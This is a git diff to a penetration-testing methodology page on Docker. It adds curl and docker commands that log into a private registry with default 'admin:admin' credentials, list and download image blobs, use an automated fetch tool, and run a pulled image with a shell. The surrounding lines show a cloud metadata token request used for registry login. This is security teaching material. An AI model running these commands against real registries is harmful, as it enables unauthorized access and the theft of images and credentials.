diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md index c4682cf..26ca5d9 100644 --- a/Methodology and Resources/Container - Docker Pentest.md +++ b/Methodology and Resources/Container - Docker Pentest.md @@ -70,6 +70,24 @@ Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. The ```powershell curl https://registry.example.com/v2//tags/list docker pull https://registry.example.com:443/: + +# connect to the endpoint and list image blobs +curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest +# download blobs +curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz +# automated download +https://github.com/NotSoSecure/docker_fetch/ +python /opt/docker_fetch/docker_image_fetch.py -u http://admin:admin@docker.registry.local +``` + +Access a private registry and start a container with one of its image + +```powershell +docker login -u admin -p admin docker.registry.local +docker pull docker.registry.local/wordpress-image +docker run -it docker.registry.local/wordpress-image /bin/bash ``` Access a private registry using OAuth Token from Google @@ -80,7 +98,6 @@ curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service docker login -e -u oauth2accesstoken -p "" https://gcr.io ``` - ## Exploit privileged container abusing the Linux cgroup v1 Prerequisite (at least one):